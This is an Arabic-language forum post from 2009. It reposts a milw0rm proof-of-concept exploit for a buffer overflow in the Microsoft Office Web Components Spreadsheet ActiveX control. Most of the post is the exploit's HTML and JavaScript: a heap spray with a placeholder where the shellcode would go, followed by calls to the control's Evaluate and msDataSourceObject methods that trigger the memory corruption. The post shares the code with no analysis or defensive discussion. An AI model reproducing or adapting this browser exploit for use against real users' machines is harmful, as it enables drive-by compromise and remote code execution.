السلام عليكم اخواني
ثغرة ActiveX BOF PoC تنزل للميلوورم بتاريخ أمس
http://www.milw0rm.com/exploits/9163كود PHP:
<!--
http://en.securitylab.ru/poc/extra/382458.php -->
<html>
<****>
<script ********="**********">
var shellcode = unescape("evil code");
var array = new Array();
var ls = 0x81000-(shellcode.length*2);
var bigblock = unescape("%u0b0c%u0b0C");
while(bigblock.length<ls/2)
{bigblock+=bigblock;}
var lh = bigblock.substring(0,ls/2);
delete bigblock;
for(i=0;i<0x99*2;i++) {
array[i] = lh + lh + shellcode;
}
CollectGarbage();
var obj = new ActiveXObject("OWC10.Spreadsheet");
e=new Array();
e.push(1);
e.push(2);
e.push(0);
e.push(window);
for(i=0;i<e.length;i++){
for(j=0;j<10;j++){
try{
obj.Evaluate(e[i]);
}
catch(e)
{}
}
}
window.status=e[3] +'';
for(j=0;j<10;j++){
try{
obj.msDataSourceObject(e[3]);
}
catch(e)
{}
}
</script>
</****>
</html>
# milw0rm.com [2009-07-16]
سلام
![02222255[1] ثغرة جديدة في الميلوورم Microsoft Office *** Components (Spreadsheet) ActiveX B Empty](https://2img.net/i/empty.gif)
موضوع: 02222255[1] ثغرة جديدة في الميلوورم Microsoft Office *** Components (Spreadsheet) ActiveX B ![02222255[1] ثغرة جديدة في الميلوورم Microsoft Office *** Components (Spreadsheet) ActiveX B Icon_minitime](https://2img.net/i/fa/onyx/icon_minitime.gif){kind=icon}
الثلاثاء يوليو 28, 2009 12:08 pm